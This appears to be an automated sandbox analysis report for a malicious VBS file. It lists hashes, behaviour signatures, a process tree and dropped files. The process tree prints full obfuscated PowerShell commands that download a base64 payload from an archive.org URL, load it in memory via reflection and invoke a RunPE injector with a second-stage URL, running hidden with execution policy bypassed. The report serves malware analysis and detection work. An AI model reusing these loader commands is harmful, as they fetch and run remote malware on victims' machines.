Analysis
-
max time kernel
227s -
max time network
285s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-10-2024 03:28
Static task
static1
General
-
Target
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs
-
Size
504KB
-
MD5
73116ddf40456b41c6b35023bc02e781
-
SHA1
037b869900d0474bf7603b8fbe3401f517f52117
-
SHA256
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a
-
SHA512
f60cbe6234371aacd3f42f87db8ea04cc3b982d9c356db5a1e0fa3959268c0aa8e78e4c059feac1619348a3453e55c3386e096812d2a4a6d61aca5cc99007be3
-
SSDEEP
12288:VS57Wp1MYi6qsGrA2OGLmeq0wM/l1d0FUvoExHRbb4XJb7q5cPT+EmJu6X:VC6X0T5VnpJ4Za
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2108 powershell.exe 6 2108 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1904 powershell.exe 2108 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 79 raw.githubusercontent.com 80 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1904 powershell.exe 2108 powershell.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe Token: SeShutdownPrivilege 2200 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2288 wrote to memory of 1904 2288 WScript.exe 28 PID 2288 wrote to memory of 1904 2288 WScript.exe 28 PID 2288 wrote to memory of 1904 2288 WScript.exe 28 PID 1904 wrote to memory of 2108 1904 powershell.exe 30 PID 1904 wrote to memory of 2108 1904 powershell.exe 30 PID 1904 wrote to memory of 2108 1904 powershell.exe 30 PID 2200 wrote to memory of 2796 2200 chrome.exe 32 PID 2200 wrote to memory of 2796 2200 chrome.exe 32 PID 2200 wrote to memory of 2796 2200 chrome.exe 32 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2520 2200 chrome.exe 34 PID 2200 wrote to memory of 2352 2200 chrome.exe 35 PID 2200 wrote to memory of 2352 2200 chrome.exe 35 PID 2200 wrote to memory of 2352 2200 chrome.exe 35 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36 PID 2200 wrote to memory of 2664 2200 chrome.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsICcrJz0gJysneycrJzB9JysnaHR0cHMnKyc6Ly9pYTYnKycwMCcrJzEwMCcrJy51cy5hJysncmNoaXYnKydlLm9yZycrJy8yNC9pJysndGUnKydtcy9kZXRhaC0nKydubycrJ3RlLScrJ3YvRGV0YWhOb3RlJysnVicrJy50JysneCcrJ3R7MH07ezF9YmFzZScrJzYnKyc0Q29udGVuJysndCA9JysnIChOZScrJ3ctJysnT2InKydqJysnZScrJ2N0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQ2xpZW50KS5Eb3dubG9hZFN0cmluZyh7MScrJ311cmwpO3sxJysnfScrJ2InKydpbicrJ2FyeScrJ0NvbnRlbnQgPScrJyBbU3lzdCcrJ2UnKydtJysnLkNvbnZlcnRdJysnOjonKydGcm9tQicrJ2FzZTY0JysnU3QnKydyaW5nKCcrJ3sxJysnfWJhJysnc2U2NENvbicrJ3RlJysnbnQpOycrJ3sxJysnfWFzc2UnKydtYmx5ID0gW1JlZmxlY3QnKydpbycrJ24nKycuQScrJ3NzZW1ibHknKyddJysnOjpMb2FkKHsxfWJpbmFyeScrJ0MnKydvJysnbicrJ3QnKydlJysnbnQpO3sxfXR5JysncGUnKycgPScrJyB7MX1hJysnc3MnKydlJysnbWJseS5HJysnZXRUeXBlJysnKHswfVJ1blBFLicrJ0hvbWV7MH0pOycrJ3sxJysnfScrJ20nKydldGhvZCA9JysnIHsxfXR5cGUuRycrJ2V0JysnTWUnKyd0JysnaG9kKCcrJ3swfVZBSXsnKycwfScrJyk7ezF9bWV0aG9kLicrJ0ludicrJ29rJysnZSh7JysnMScrJ31udScrJ2xsLCBbbycrJ2JqZWMnKyd0JysnWycrJ11dJysnQCh7MH10eCcrJ3QueHR5bS92ZWQuJysnMicrJ3IuMzliMzQnKyc1MzAnKycyYScrJzA3JysnNWIxYmMwZDQnKyc1YjYzMmViOWVlNjInKyctYicrJ3UnKydwJysnLy86cycrJ3B0dCcrJ2h7MCcrJ30gLCcrJyAnKyd7MCcrJ31kZXNhdGl2YWRvezB9ICcrJywgezB9ZGVzYXQnKydpdmEnKydkb3snKycwJysnfScrJyAsIHswfWQnKydlc2F0JysnaScrJ3ZhJysnZG97MH0sezB9QScrJ2RkSScrJ25Qcm9jZScrJ3NzMycrJzJ7MH0sJysnezAnKyd9JysnezAnKyd9KScrJyknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzYpIHwgLiAoKEdWICcqbWRSKicpLm5hbWVbMywxMSwyXS1Kb2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url '+'= '+'{'+'0}'+'https'+'://ia6'+'00'+'100'+'.us.a'+'rchiv'+'e.org'+'/24/i'+'te'+'ms/detah-'+'no'+'te-'+'v/DetahNote'+'V'+'.t'+'x'+'t{0};{1}base'+'6'+'4Conten'+'t ='+' (Ne'+'w-'+'Ob'+'j'+'e'+'ct System.N'+'e'+'t'+'.Web'+'Client).DownloadString({1'+'}url);{1'+'}'+'b'+'in'+'ary'+'Content ='+' [Syst'+'e'+'m'+'.Convert]'+'::'+'FromB'+'ase64'+'St'+'ring('+'{1'+'}ba'+'se64Con'+'te'+'nt);'+'{1'+'}asse'+'mbly = [Reflect'+'io'+'n'+'.A'+'ssembly'+']'+'::Load({1}binary'+'C'+'o'+'n'+'t'+'e'+'nt);{1}ty'+'pe'+' ='+' {1}a'+'ss'+'e'+'mbly.G'+'etType'+'({0}RunPE.'+'Home{0});'+'{1'+'}'+'m'+'ethod ='+' {1}type.G'+'et'+'Me'+'t'+'hod('+'{0}VAI{'+'0}'+');{1}method.'+'Inv'+'ok'+'e({'+'1'+'}nu'+'ll, [o'+'bjec'+'t'+'['+']]'+'@({0}tx'+'t.xtym/ved.'+'2'+'r.39b34'+'530'+'2a'+'07'+'5b1bc0d4'+'5b632eb9ee62'+'-b'+'u'+'p'+'//:s'+'ptt'+'h{0'+'} ,'+' '+'{0'+'}desativado{0} '+', {0}desat'+'iva'+'do{'+'0'+'}'+' , {0}d'+'esat'+'i'+'va'+'do{0},{0}A'+'ddI'+'nProce'+'ss3'+'2{0},'+'{0'+'}'+'{0'+'})'+')') -F [cHar]39,[cHar]36) | . ((GV '*mdR*').name[3,11,2]-Join'')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef74b9758,0x7fef74b9768,0x7fef74b97782⤵PID:2796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:22⤵PID:2520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:82⤵PID:2352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:82⤵PID:2664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2288 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:12⤵PID:1628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:12⤵PID:320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1464 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:22⤵PID:2312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1476 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:12⤵PID:2096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3004 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:82⤵PID:2976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:82⤵PID:576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3620 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:82⤵PID:2476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3800 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:12⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3452 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:12⤵PID:3060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2144 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:12⤵PID:844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:82⤵PID:1116
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2768
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55cf3afc836a9db89d6218fcb3c05bfb2
SHA154599e78d08b0d1bd816d7aa8c2ec442bf7f3090
SHA2569f336c7e1854cdc6e8a171d84c4da30f3cd46757f1421f3300eda1cda231507e
SHA5121ce3092a6244f33e6aec3f6918c311dab6cf7caa48e9a4dcbf1170dc0cfd9a3b6e8df69c31c08dca4b3d6a198da2e23406448732f4cb348bd62578eb979e6a75
-
Filesize
16B
MD5aefd77f47fb84fae5ea194496b44c67a
SHA1dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA2564166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
3KB
MD5a74be49c6e7e6a18f5a000c474ddab9a
SHA17fb53b35503a535cedf2aa6edda1a5feaddcbaf9
SHA2568da46adfe7d428c1be3df656356eff86af8daa15d0bde559229e6ee9a412e171
SHA512625f4f077b0b763a854916bb85ac9078ee8d0f3b4f13c5ca99db2b71952670bdcf82bd911a30cf14722b45eb5602cbf8429bb3cba98e83d105f74e7a8b193e17
-
Filesize
4KB
MD5fed3b0f79b0d8d0db9e181fde83ebbec
SHA1300b13b699a61031948eb00c92b0551c2fafede7
SHA256b560367ee6ca71f846ebbc4daf08180404d3b8b61ddf9e2e2017219a032fddae
SHA512d13ff4979d921397a53dcff3e5eafaad2456a6dbee00a8deeb0887da9679be6da0c512d52d4a17b2a48f976815c3d08705748a35ac07907cef24b7a02aaeb3f0
-
Filesize
527B
MD5f3125af1a56af1a6c50ff8c33059036c
SHA1b97b4c8b33e9ab5b88dbbab28d0025430fa105c6
SHA2567d0b4c92396a04207f290ea225aa3169d3030862fc2b53be35a3a9683ff78e18
SHA512e42bd79fd6b6f84017d60112090673d390ffa2de437245eb1aefc9977f3d07628f84c91b4bb047039a1cdf0c170de1a3d68d94e932e094a26eca5fcca18b01cb
-
Filesize
527B
MD53bdae73c71d63b72dc31822d171d4e93
SHA10eedc3bc914baf80f478064a26586173d0f36443
SHA25648229d16c30d24abf5e26af1f21ce7773a4b949936d0fd90af5d62f101d96227
SHA512dfeb7e4d71ccde2a9c998b0b3387954b912b4e7e1d5df623ef2c60dc728baaf0e0274f2ff88fb987dac8bc106593df2b784dc1eda5849c6631cfd4f971d5c817
-
Filesize
6KB
MD50b10adf6d9ae671934a002933af0ab5d
SHA13c21864d82c9a1e0d0ca7e84ffff60bbd6e5782d
SHA256aee715287528d909035c1d82ef9cdf343e328d243967e6334162ae5d83e49558
SHA512e7e7a899910169c121756a90c3cf23ba91f8297d586974efe3a18c413094c743263cae063e2a2a19651f64ff9e20f23d1e8eef81e9919a4da0c91975a3e9a8ef
-
Filesize
5KB
MD5150b338682ae7b30bb2c7d85cb7ff1d8
SHA112cec805e6dbb790194d0eaf1801944ce931f945
SHA256d6aa7d53d63a1a9cadab6b555b040794e95c54ca77d0d28436a6ce1e7e3b32c7
SHA5124575f9c462becd3935651936a2191856f925e090376a60b595ac676ce269977a4b1eb82469bd9a15b1c4c21c56c4241364f9cb91bfa8bc66967e6bb37393e8d1
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\da308f04-a095-45ce-aec7-f7a1dfe29fe9.tmp
Filesize6KB
MD58e0f22d5a6dac801a070b77a4a9e662e
SHA1732b41adb964373ce453d174291a48cbd36c25ec
SHA256edef6faa0a4c407da6788bd90ed52e3ab8fbbe3cc9acd5a875be4402d2eeca7e
SHA51292edaa85e019e46cccb4df53276c87f4db7e918843588f0f961d5f6645567b9a3e20b8591a5ef7997d3cff5ebff0caeece8402ad6d1b6bf13f7ed59a22ba7b6f
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58d94ff05ada3159d426d97c4d36107c4
SHA1233f9cb0766ea11dd049be69c9e1f2092eb51108
SHA256cfa6b34a80ae9fc431ba0b2a969648e78b7462b451f5b6c046d4374e39349a39
SHA512e1ca20b0e4513abe6a47625778bb8869bb776d7c96e826cc1a32394897ed23132f1628ad5b4b85f5f96224da42844a456629327525efe5a0a09d9e188e6062b7